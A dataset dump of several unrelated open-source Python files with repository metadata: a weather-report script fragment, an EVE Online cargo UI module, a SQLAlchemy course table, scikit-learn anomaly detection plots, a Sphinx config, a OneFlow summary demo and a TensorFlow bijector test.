log_cmd(f"FAILURE: {output}")
if rc == 0:
return output
else:
return None
def get_temp(raw_output: str) -> str:
"""Returns temperature."""
temp = get_group(r"Temperature: ([0-9]+\.[0-9]) F", raw_output)
if temp is None:
return "N/A"
else:
return f"{round(float(temp))} F"
def get_humidity(raw_output: str) -> Optional[str]:
humidity = get_group("Humidity:[ ]*([1-9][0-9]*%)", raw_output)
return humidity
def get_wind(raw_output: str) -> Optional[str]:
"""Returns wind description."""
wind = get_group(r"Wind: .*?([0-9\-]+ MPH)", raw_output)
if wind is None:
wind = get_group(r"Wind: (.*)", raw_output)
return wind
def get_group(pttrn: str, string: str) -> Optional[str]:
"""Returns the first group matched from a regex pattern."""
match = re.search(pttrn, string, re.M)
if match:
return match.groups()[0]
else:
return None
def format_report(
_loc: str,
temp: str,
sky: Optional[str],
wind: Optional[str],
humidity: Optional[str],
) -> str:
"""Formats weather report."""
report_fmt = "{} ::: TEMP: {}"
now = dt.datetime.now()
timestamp = now.strftime("@%H:%M:%S")
report = report_fmt.format(timestamp, temp)
if humidity is not None:
report = f"{report} | HUMIDITY: {humidity}"
if sky is not None:
report = f"{report} | SKY: {sky}"
if wind is not None:
report = f"{report} | WIND: {wind}"
return report
if __name__ == "__main__":
sys.exit(main())
| [
"bryanbugyi34@gmail.com"
] | bryanbugyi34@gmail.com |
3e063e740006b9aab8f0c31edc73a70926e13dd6 | 5864e86954a221d52d4fa83a607c71bacf201c5a | /eve/client/script/ui/station/fitting/minihangar.py | 1990c0fe486beccfd0fdcb8e5e6616770fb04410 | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,161 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\ui\station\fitting\minihangar.py
from carbonui.primitives.container import Container
from carbonui.primitives.fill import Fill
from eve.client.script.ui.shared.fitting.fittingStatsChanges import FittingStatsChanges
from inventorycommon.util import IsShipFittingFlag, IsShipFittable
import uicontrols
import uthread
import util
import carbonui.const as uiconst
import localization
import invCtrl
class CargoSlots(Container):
default_state = uiconst.UI_NORMAL
def ApplyAttributes(self, attributes):
Container.ApplyAttributes(self, attributes)
self.controller = attributes.controller
self.controller.on_stats_changed.connect(self.UpdateCargoSpace)
invController = self.GetInvController()
self.sr.icon = uicontrols.Icon(parent=self, size=32, state=uiconst.UI_DISABLED, ignoreSize=True, icon=invController.GetIconName())
self.sr.hint = invController.GetName()
self.sr.hilite = Fill(parent=self, name='hilite', align=uiconst.RELATIVE, state=uiconst.UI_HIDDEN, idx=-1, width=32, height=self.height)
self.sr.icon.color.a = 0.8
Container(name='push', parent=self, align=uiconst.TOLEFT, width=32)
self.sr.statusCont = Container(name='statusCont', parent=self, align=uiconst.TOLEFT, width=50)
self.sr.statustext1 = uicontrols.EveLabelMedium(text='status', parent=self.sr.statusCont, name='cargo_statustext', left=0, top=2, idx=0, state=uiconst.UI_DISABLED, align=uiconst.TOPRIGHT)
self.sr.statustext2 = uicontrols.EveLabelMedium(text='status', parent=self.sr.statusCont, name='cargo_statustext', left=0, top=14, idx=0, state=uiconst.UI_DISABLED, align=uiconst.TOPRIGHT)
m3TextCont = Container(name='m3Cont', parent=self, align=uiconst.TOLEFT, width=12)
self.sr.m3Text = uicontrols.EveLabelMedium(text=localization.GetByLabel('UI/Fitting/FittingWindow/CubicMeters'), parent=m3TextCont, name='m3', left=4, top=14, idx=0)
sm.GetService('inv').Register(self)
self.invReady = 1
self.UpdateCargoSpace()
def IsItemHere(self, item):
return self.GetInvController().IsItemHere(item)
def AddItem(self, item):
self.Update()
def UpdateItem(self, item, *etc):
self.Update()
def RemoveItem(self, item):
self.Update()
def OnMouseEnter(self, *args):
self.DoMouseEntering()
def OnMouseEnterDrone(self, *args):
if eve.session.stationid:
self.DoMouseEntering()
def DoMouseEntering(self):
self.Hilite(1)
self.sr.statustext1.OnMouseEnter()
self.sr.statustext2.OnMouseEnter()
self.sr.m3Text.OnMouseEnter()
def OnMouseExit(self, *args):
self.Hilite(0)
self.sr.statustext1.OnMouseExit()
self.sr.statustext2.OnMouseExit()
self.sr.m3Text.OnMouseExit()
uthread.new(self.Update)
def Hilite(self, state):
self.sr.icon.color.a = [0.8, 1.0][state]
def SetStatusText(self, text1, text2, color):
self.sr.statustext1.text = text1
self.sr.statustext2.text = localization.GetByLabel('UI/Fitting/FittingWindow/CargoUsage', color=color, text=text2)
self.sr.statusCont.width = max(0, self.sr.statustext1.textwidth, self.sr.statustext2.textwidth)
def OnDropData(self, dragObj, nodes):
self.Hilite(0)
def Update(self, multiplier = 1.0):
uthread.new(self._Update, multiplier)
def _Update(self, multiplier):
cap = self.GetCapacity()
if not cap:
return
if not self or self.destroyed:
return
cap2 = cap.capacity * multiplier
color = '<color=0xc0ffffff>'
if multiplier != 1.0:
color = '<color=0xffffff00>'
used = util.FmtAmt(cap.used, showFraction=1)
cap2 = util.FmtAmt(cap2, showFraction=1)
self.SetStatusText(used, cap2, color)
def GetCapacity(self, flag = None):
return self.GetInvController().GetCapacity()
class CargoDroneSlots(CargoSlots):
def GetInvController(self):
return invCtrl.ShipDroneBay(self.controller.GetItemID())
def OnDropData(self, dragObj, nodes):
invCtrl.ShipDroneBay(util.GetActiveShip()).OnDropData(nodes)
CargoSlots.OnDropData(self, dragObj, nodes)
def OnClick(self, *args):
uicore.cmd.OpenDroneBayOfActiveShip()
def UpdateCargoSpace(self):
typeID = self.controller.GetGhostFittedTypeID()
fittingChanges = FittingStatsChanges(typeID)
xtraDroneSpace = fittingChanges.GetExtraDroneSpaceMultiplier()
self.Update(xtraDroneSpace)
class CargoFighterSlots(CargoSlots):
def GetInvController(self):
return invCtrl.ShipFighterBay(self.controller.GetItemID())
def OnDropData(self, dragObj, nodes):
self.GetInvController().OnDropData(nodes)
CargoSlots.OnDropData(self, dragObj, nodes)
def OnClick(self, *args):
uicore.cmd.OpenFighterBayOfActiveShip()
def UpdateCargoSpace(self):
typeID = self.controller.GetGhostFittedTypeID()
fittingChanges = FittingStatsChanges(typeID)
xtraFighterSpace = fittingChanges.GetExtraFighterSpaceMultiplier()
self.Update(xtraFighterSpace)
class CargoStructureAmmoBay(CargoSlots):
def GetInvController(self):
return invCtrl.StructureAmmoBay(self.controller.GetItemID())
def OnDropData(self, dragObj, nodes):
self.GetInvController().OnDropData(nodes)
CargoSlots.OnDropData(self, dragObj, nodes)
def OnClick(self, *args):
invID = ('StructureAmmoBay', self.controller.GetItemID())
from eve.client.script.ui.shared.inventory.invWindow import Inventory
Inventory.OpenOrShow(invID, usePrimary=False, toggle=True)
def UpdateCargoSpace(self):
self.Update()
class CargoCargoSlots(CargoSlots):
def GetInvController(self):
return invCtrl.ShipCargo(self.controller.GetItemID())
def OnDropData(self, dragObj, nodes):
self.Hilite(0)
if len(nodes) == 1:
item = nodes[0].item
if IsShipFittingFlag(item.flagID):
dogmaLocation = sm.GetService('clientDogmaIM').GetDogmaLocation()
shipID = util.GetActiveShip()
if IsShipFittable(item.categoryID):
dogmaLocation.UnloadModuleToContainer(shipID, item.itemID, (shipID,), flag=const.flagCargo)
return
if item.categoryID == const.categoryCharge:
dogmaLocation.UnloadChargeToContainer(shipID, item.itemID, (shipID,), const.flagCargo)
return
invCtrl.ShipCargo(util.GetActiveShip()).OnDropData(nodes)
CargoSlots.OnDropData(self, dragObj, nodes)
def OnClick(self, *args):
uicore.cmd.OpenCargoHoldOfActiveShip()
def UpdateCargoSpace(self):
typeID = self.controller.GetGhostFittedTypeID()
fittingChanges = FittingStatsChanges(typeID)
xtraCargoSpace = fittingChanges.GetExtraCargoSpaceMultiplier()
self.Update(xtraCargoSpace)
| [
"le02005@163.com"
] | le02005@163.com |
7f330b9f70088b20251a7e199f7b97aeee3e03db | 81e302a2fe2035d13710d6aa9b13fb763dcf8fa4 | /chapter4/create_table_02.py | b661782e443bcadfeb96ee328a3d727d0a3d1fd2 | [] | no_license | liuyuzhou/databasesourcecode | 8a76099efc86292b1449c3a84b35ba02398bcbe9 | 1f3ad5f27d194c2aa88fa8cb39c6ae92ee3d1f1f | refs/heads/master | 2021-07-18T06:18:28.538719 | 2021-07-03T01:56:58 | 2021-07-03T01:56:58 | 250,950,207 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 893 | py | from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
# 声明映射
Base = declarative_base()
# 定义Course对象,课程表对象
class Course(Base):
# 表的名字
__tablename__ = 'course'
id = Column(Integer, primary_key=True)
course_name = Column(String(20), default=None, nullable=False, comment='课程名称')
teacher_name = Column(String(20), default=None, nullable=False, comment='任课老师')
class_times = Column(Integer, default=0, nullable=False, comment='课时')
# 定义__repr__函数,返回一个可以用来表示对象的可打印字符串
def __repr__(self):
c_name = self.course_name
t_name = self.teacher_name
c_times = self.class_times
return f"Course:(course_name={c_name}, teacher_name={t_name}, class_times={c_times})"
| [
"jxgzyuzhouliu@163.com"
] | jxgzyuzhouliu@163.com |
829ec35d9450bf7dddf39940d17e80553d22d4b8 | fd529ba6ade52cd2a3dab94da01252d7ea90398d | /zerojudge/b130.py | aed6f2b48f8d15ee266fb51fd69118bdc7533a8d | [] | no_license | fjfhfjfjgishbrk/AE401-Python | 4a984deb0281542c205d72695285b35c7413338f | ee80fa4588b127cff2402fd81e732ede28a66411 | refs/heads/master | 2022-06-13T13:49:39.875567 | 2022-05-28T12:40:51 | 2022-05-28T12:40:51 | 251,178,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 27 11:16 2020
@author: fdbfvuie
"""
while 1:
try:
input()
a = [int(i) for i in input().split()]
a = list(dict.fromkeys(a))
a.sort()
print(len(a))
print(" ".join([str(i) for i in a]))
except:
break | [
"59891511+fjfhfjfjgishbrk@users.noreply.github.com"
] | 59891511+fjfhfjfjgishbrk@users.noreply.github.com |
b8abb10ab99545daf4c9bf1ff199c941fd73e82e | 6cd3de9d6aa0c52602010aa857966d5dc4d57442 | /_unittests/ut_testing/data/plot_anomaly_comparison.py | 81f4f31d3c39d1702e592d94d0ac07921367ed62 | [
"MIT"
] | permissive | xadupre/mlprodict | 2307ca96eafeeafff08d5322184399bb5dc1c37e | f82c8a26a60104948c67849b1c4af95ca812c153 | refs/heads/master | 2022-12-10T18:50:36.953032 | 2020-09-03T08:53:58 | 2020-09-03T08:53:58 | 292,824,744 | 1 | 0 | NOASSERTION | 2020-09-04T10:56:45 | 2020-09-04T10:56:44 | null | UTF-8 | Python | false | false | 3,372 | py | import time
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from sklearn import svm
from sklearn.datasets import make_moons, make_blobs
from sklearn.covariance import EllipticEnvelope
from sklearn.ensemble import IsolationForest
from sklearn.neighbors import LocalOutlierFactor
# Adapted from the scikit-learn example gallery: "Comparing anomaly detection
# algorithms for outlier detection on toy datasets".  Draws a grid of plots:
# one row per toy dataset, one column per detector, decision boundary in black.
matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
# Example settings
n_samples = 300
outliers_fraction = 0.15
n_outliers = int(outliers_fraction * n_samples)
n_inliers = n_samples - n_outliers
# define outlier/anomaly detection methods to be compared
anomaly_algorithms = [
    ("Robust covariance", EllipticEnvelope(contamination=outliers_fraction)),
    ("One-Class SVM", svm.OneClassSVM(nu=outliers_fraction, kernel="rbf",
                                      gamma=0.1)),
    ("Isolation Forest", IsolationForest(contamination=outliers_fraction,
                                         random_state=42)),
    ("Local Outlier Factor", LocalOutlierFactor(
        n_neighbors=35, contamination=outliers_fraction))]
# Define datasets: two unimodal blobs, two bimodal blob pairs with different
# spreads, scaled moons, and uniform noise (no structure at all).
blobs_params = dict(random_state=0, n_samples=n_inliers, n_features=2)
datasets = [
    make_blobs(centers=[[0, 0], [0, 0]], cluster_std=0.5,
               **blobs_params)[0],
    make_blobs(centers=[[2, 2], [-2, -2]], cluster_std=[0.5, 0.5],
               **blobs_params)[0],
    make_blobs(centers=[[2, 2], [-2, -2]], cluster_std=[1.5, .3],
               **blobs_params)[0],
    4. * (make_moons(n_samples=n_samples, noise=.05, random_state=0)[0] -
          np.array([0.5, 0.25])),
    14. * (np.random.RandomState(42).rand(n_samples, 2) - 0.5)]  # pylint: disable=E1101
# Compare given classifiers under given settings; (xx, yy) is the evaluation
# grid used to draw each detector's decision boundary.
xx, yy = np.meshgrid(np.linspace(-7, 7, 150),
                     np.linspace(-7, 7, 150))
plt.figure(figsize=(len(anomaly_algorithms) * 2 + 3, 12.5))
plt.subplots_adjust(left=.02, right=.98, bottom=.001, top=.96, wspace=.05,
                    hspace=.01)
plot_num = 1
rng = np.random.RandomState(42)  # pylint: disable=E1101
for i_dataset, X in enumerate(datasets):
    # Add outliers
    X = np.concatenate([X, rng.uniform(low=-6, high=6,
                       size=(n_outliers, 2))], axis=0)
    for name, algorithm in anomaly_algorithms:
        # NOTE(review): the fit below is timed, but non-LOF algorithms are
        # fit a second time a few lines further down — the timing and the
        # extra fit come from the upstream example.
        t0 = time.time()
        algorithm.fit(X)
        t1 = time.time()
        plt.subplot(len(datasets), len(anomaly_algorithms), plot_num)
        if i_dataset == 0:
            plt.title(name, size=18)
        # fit the data and tag outliers (+1 = inlier, -1 = outlier)
        if name == "Local Outlier Factor":
            y_pred = algorithm.fit_predict(X)
        else:
            y_pred = algorithm.fit(X).predict(X)
        # plot the levels lines and the points
        if name != "Local Outlier Factor":  # LOF does not implement predict
            Z = algorithm.predict(np.c_[xx.ravel(), yy.ravel()])
            Z = Z.reshape(xx.shape)
            plt.contour(xx, yy, Z, levels=[0], linewidths=2, colors='black')
        colors = np.array(['#377eb8', '#ff7f00'])
        # (y_pred + 1) // 2 maps -1 -> 0 (blue) and +1 -> 1 (orange).
        plt.scatter(X[:, 0], X[:, 1], s=10, color=colors[(y_pred + 1) // 2])
        plt.xlim(-7, 7)
        plt.ylim(-7, 7)
        plt.xticks(())
        plt.yticks(())
        plt.text(.99, .01, ('%.2fs' % (t1 - t0)).lstrip('0'),
                 transform=plt.gca().transAxes, size=15,
                 horizontalalignment='right')
        plot_num += 1
plt.show()
| [
"xavier.dupre@gmail.com"
] | xavier.dupre@gmail.com |
a756e899283617e6565cb60bca961f619d739868 | e95f65f1e320e56306c4442329b756fdd6ed00fa | /docs/conf.py | 895973e0dc0a1a87a40edc0bfeedfb11f8ec6bf3 | [
"Apache-2.0",
"MIT"
] | permissive | 0xflotus/CUP | 3a808248126a9ef8d3436a1aadf2384fcb869acb | 5e4330cb2e4ccdc67ad94f0084e745eed6f96d6b | refs/heads/master | 2020-03-31T06:08:29.823081 | 2018-09-30T13:32:23 | 2018-09-30T13:32:23 | 151,969,632 | 0 | 0 | NOASSERTION | 2018-10-07T17:56:57 | 2018-10-07T17:56:57 | null | UTF-8 | Python | false | false | 5,882 | py | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, u'/Users/baidu/baidu/code/open-source/python/cup_on_github/cup')
# -- Project information -----------------------------------------------------
project = u'cup'
copyright = u'2018, CUP-DEV'
author = u'CUP-DEV'
# The short X.Y version
version = u'1.7'
# The full version, including alpha/beta/rc tags
release = u'1.7.0'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.todo',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
html_theme_options = {
'canonical_url': '',
'analytics_id': '',
'logo_only': False,
'display_version': True,
'prev_next_buttons_location': 'bottom',
'style_external_links': False,
# 'vcs_pageview_mode': '',
# Toc options
'collapse_navigation': True,
'sticky_navigation': True,
'navigation_depth': 4,
'includehidden': True,
'titles_only': False
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'cupdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'cup.tex', u'cup Documentation',
u'Author', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'cup', u'cup Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'cup', u'cup Documentation',
author, 'cup', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Extension configuration -------------------------------------------------
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
| [
"mythmgn@gmail.com"
] | mythmgn@gmail.com |
a1605ab46f979a8f2dccfce926267377f4662068 | 3670f46666214ef5e1ce6765e47b24758f3614a9 | /oneflow/python/test/ops/test_summary.py | abfbb915308413ee0f84e72659ac02d44f959708 | [
"Apache-2.0"
] | permissive | ashing-zhang/oneflow | 0b8bb478ccd6cabea2dca0864defddab231919bf | 70db228a4d361c916f8f8d85e908795b479e5d20 | refs/heads/master | 2022-12-14T21:13:46.752535 | 2020-09-07T03:08:52 | 2020-09-07T03:08:52 | 293,535,931 | 1 | 0 | Apache-2.0 | 2020-09-07T13:28:25 | 2020-09-07T13:28:24 | null | UTF-8 | Python | false | false | 6,006 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import numpy as np
import tensorflow as tf
import oneflow as flow
from collections import OrderedDict
import cv2
import time
from test_util import GenArgList
def _read_images_by_cv(image_files):
    """Load each file as an RGB uint8 array and resize all to 512x512."""
    decoded = []
    for image_file in image_files:
        bgr = cv2.imread(image_file)
        decoded.append(cv2.cvtColor(bgr, cv2.COLOR_BGR2RGB).astype(np.uint8))
    return [cv2.resize(image, (512, 512)) for image in decoded]
def summary_demo():
    """Exercise the flow.summary API end to end.

    Defines one OneFlow global function per summary type (scalar, histogram,
    protobuf, image, flush), feeds each with synthetic data, and also drives
    the embedding/exception projectors and the structure-graph writer.

    NOTE(review): `projecotr` is a typo for `projector` (kept as-is: renaming
    is out of scope here); `value_` is assigned but never used; np.fromstring
    is deprecated in favour of np.frombuffer — confirm before upgrading NumPy.
    """
    func_config = flow.FunctionConfig()
    func_config.default_data_type(flow.float)
    func_config.default_logical_view(flow.scope.mirrored_view())
    logdir = "/oneflow/log"
    # --- summary-writing global functions -------------------------------
    @flow.global_function(function_config=func_config)
    def CreateWriter():
        flow.summary.create_summary_writer(logdir)
    @flow.global_function(function_config=func_config)
    def ScalarJob(
        value: flow.typing.ListNumpy.Placeholder((1,), dtype=flow.float),
        step: flow.typing.ListNumpy.Placeholder((1,), dtype=flow.int64),
        tag: flow.typing.ListNumpy.Placeholder((1000,), dtype=flow.int8),
    ):
        flow.summary.scalar(value, step, tag)
    @flow.global_function(function_config=func_config)
    def HistogramJob(
        value: flow.typing.ListNumpy.Placeholder((200, 200, 200), dtype=flow.float),
        step: flow.typing.ListNumpy.Placeholder((1,), dtype=flow.int64),
        tag: flow.typing.ListNumpy.Placeholder((9,), dtype=flow.int8),
    ):
        flow.summary.histogram(value, step, tag)
    @flow.global_function(function_config=func_config)
    def PbJob(
        value: flow.typing.ListNumpy.Placeholder((1500,), dtype=flow.int8),
        step: flow.typing.ListNumpy.Placeholder((1,), dtype=flow.int64),
    ):
        flow.summary.pb(value, step=step)
    @flow.global_function(function_config=func_config)
    def ImageJob(
        value: flow.typing.ListNumpy.Placeholder(
            shape=(100, 2000, 2000, 4), dtype=flow.uint8
        ),
        step: flow.typing.ListNumpy.Placeholder((1,), dtype=flow.int64),
        tag: flow.typing.ListNumpy.Placeholder((10,), dtype=flow.int8),
    ):
        flow.summary.image(value, step=step, tag=tag)
    @flow.global_function(function_config=func_config)
    def FlushJob():
        flow.summary.flush_summary_writer()
    CreateWriter()
    projecotr = flow.summary.Projector(logdir)
    projecotr.create_embedding_projector()
    projecotr.create_exception_projector()
    # Hyper-parameter summary: mixes typed HParam keys, a Metric, and a
    # plain-string key.
    hparams = {
        flow.summary.HParam("learning_rate", flow.summary.RealRange(1e-2, 1e-1)): 0.02,
        flow.summary.HParam("dense_layers", flow.summary.IntegerRange(2, 7)): 5,
        flow.summary.HParam(
            "optimizer", flow.summary.ValueSet(["adam", "sgd"])
        ): "adam",
        flow.summary.HParam("accuracy", flow.summary.RealRange(1e-2, 1e-1)): 0.001,
        flow.summary.HParam("magic", flow.summary.ValueSet([False, True])): True,
        flow.summary.Metric("loss", float): 0.02,
        "dropout": 0.6,
    }
    # Serialize text and hparams protobufs to int8 arrays and log them.
    for i in range(200):
        t = ["vgg16", "resnet50", "mask-rcnn", "yolov3"]
        pb = flow.summary.text(t)
        value = np.fromstring(str(pb), dtype=np.int8)
        step = np.array([i], dtype=np.int64)
        PbJob([value], [step])
        pb2 = flow.summary.hparams(hparams)
        value = np.fromstring(str(pb2), dtype=np.int8)
        step = np.array([i], dtype=np.int64)
        PbJob([value], [step])
    for idx in range(10):
        value = np.array([idx], dtype=np.float32)
        step = np.array([idx], dtype=np.int64)
        tag = np.fromstring("scalar", dtype=np.int8)
        ScalarJob([value], [step], [tag])
    value = np.array(
        [
            [[1, 2, 3, 0], [0, 2, 3, 1], [2, 3, 4, 1]],
            [[1, 0, 2, 0], [2, 1, 2, 0], [2, 1, 1, 1]],
        ],
        dtype=np.float64,
    )
    for idx in range(1):
        value = np.random.rand(100, 100, 100).astype(np.float32)
        step = np.array([idx], dtype=np.int64)
        tag = np.fromstring("histogram", dtype=np.int8)
        HistogramJob([value], [step], [tag])
    value_ = np.random.rand(10, 10, 10).astype(np.float32)
    label = (np.random.rand(10) * 10).astype(np.int64)
    x = (np.random.rand(10, 10, 10) * 255).astype(np.uint8)
    sample_name = "sample"
    sample_type = "image"
    step = 1
    tag_exception = "exception_projector"
    tag_embedding = "embedding_projector"
    projecotr.exception_projector(
        value=value,
        tag=tag_exception,
        step=step,
        sample_name=sample_name,
        sample_type=sample_type,
        x=x,
    )
    projecotr.embedding_projector(
        value=value,
        label=label,
        tag=tag_embedding,
        step=step,
        sample_name=sample_name,
        sample_type=sample_type,
    )
    # Build an image batch: two files from disk plus one synthetic yellow tile.
    image1_path = "~/oneflow/image1"
    image2_path = "~/oneflow/image2"
    image_files = [
        image1_path,
        image2_path,
    ]
    images = _read_images_by_cv(image_files)
    images = np.array(images, dtype=np.uint8)
    imageRed = np.ones([512, 512, 3]).astype(np.uint8)
    Red = np.array([0, 255, 255], dtype=np.uint8)
    imageNew = np.multiply(imageRed, Red)
    imageNew = np.expand_dims(imageNew, axis=0)
    images = np.concatenate((images, imageNew), axis=0)
    step = np.array([1], dtype=np.int64)
    tag = np.fromstring("image", dtype=np.int8)
    ImageJob([images], [step], [tag])
    graph = flow.summary.Graph(logdir)
    graph.write_structure_graph()
| [
"noreply@github.com"
] | ashing-zhang.noreply@github.com |
946f16bbbb68b0e88e2045b3bbb65935e136bcb4 | 169e75df163bb311198562d286d37aad14677101 | /tensorflow/tensorflow/contrib/distributions/python/kernel_tests/bijectors/invert_test.py | 8b14c8327f08902044f50483f9f8dfe67b58cd70 | [
"Apache-2.0"
] | permissive | zylo117/tensorflow-gpu-macosx | e553d17b769c67dfda0440df8ac1314405e4a10a | 181bc2b37aa8a3eeb11a942d8f330b04abc804b3 | refs/heads/master | 2022-10-19T21:35:18.148271 | 2020-10-15T02:33:20 | 2020-10-15T02:33:20 | 134,240,831 | 116 | 26 | Apache-2.0 | 2022-10-04T23:36:22 | 2018-05-21T08:29:12 | C++ | UTF-8 | Python | false | false | 3,534 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Bijector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.distributions.python.ops import bijectors
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops.distributions import gamma as gamma_lib
from tensorflow.python.ops.distributions import transformed_distribution as transformed_distribution_lib
from tensorflow.python.ops.distributions.bijector_test_util import assert_scalar_congruency
from tensorflow.python.platform import test
class InvertBijectorTest(test.TestCase):
  """Tests the correctness of the Y = Invert(bij) transformation."""

  def testBijector(self):
    """Invert(b) swaps forward/inverse and the two log-det Jacobians."""
    with self.test_session():
      for fwd in [
          bijectors.Identity(),
          bijectors.Exp(),
          bijectors.Affine(shift=[0., 1.], scale_diag=[2., 3.]),
          bijectors.Softplus(),
          bijectors.SoftmaxCentered(),
      ]:
        rev = bijectors.Invert(fwd)
        self.assertEqual("_".join(["invert", fwd.name]), rev.name)
        x = [[[1., 2.],
              [2., 3.]]]
        self.assertAllClose(fwd.inverse(x).eval(), rev.forward(x).eval())
        self.assertAllClose(fwd.forward(x).eval(), rev.inverse(x).eval())
        self.assertAllClose(
            fwd.forward_log_det_jacobian(x, event_ndims=1).eval(),
            rev.inverse_log_det_jacobian(x, event_ndims=1).eval())
        self.assertAllClose(
            fwd.inverse_log_det_jacobian(x, event_ndims=1).eval(),
            rev.forward_log_det_jacobian(x, event_ndims=1).eval())

  def testScalarCongruency(self):
    """Inverted Exp still satisfies the scalar-bijector consistency checks."""
    with self.test_session():
      bijector = bijectors.Invert(bijectors.Exp())
      assert_scalar_congruency(
          bijector, lower_x=1e-3, upper_x=1.5, rtol=0.05)

  def testShapeGetters(self):
    """Event-shape getters are swapped relative to the wrapped bijector."""
    with self.test_session():
      bijector = bijectors.Invert(bijectors.SoftmaxCentered(validate_args=True))
      x = tensor_shape.TensorShape([2])
      y = tensor_shape.TensorShape([1])
      self.assertAllEqual(y, bijector.forward_event_shape(x))
      self.assertAllEqual(
          y.as_list(),
          bijector.forward_event_shape_tensor(x.as_list()).eval())
      self.assertAllEqual(x, bijector.inverse_event_shape(y))
      self.assertAllEqual(
          x.as_list(),
          bijector.inverse_event_shape_tensor(y.as_list()).eval())

  def testDocstringExample(self):
    """Exp-Gamma built via Invert(Exp) yields scalar (shape []) samples."""
    with self.test_session():
      exp_gamma_distribution = (
          transformed_distribution_lib.TransformedDistribution(
              distribution=gamma_lib.Gamma(concentration=1., rate=2.),
              bijector=bijectors.Invert(bijectors.Exp())))
      self.assertAllEqual(
          [], array_ops.shape(exp_gamma_distribution.sample()).eval())
if __name__ == "__main__":
test.main()
| [
"thomas.warfel@pnnl.gov"
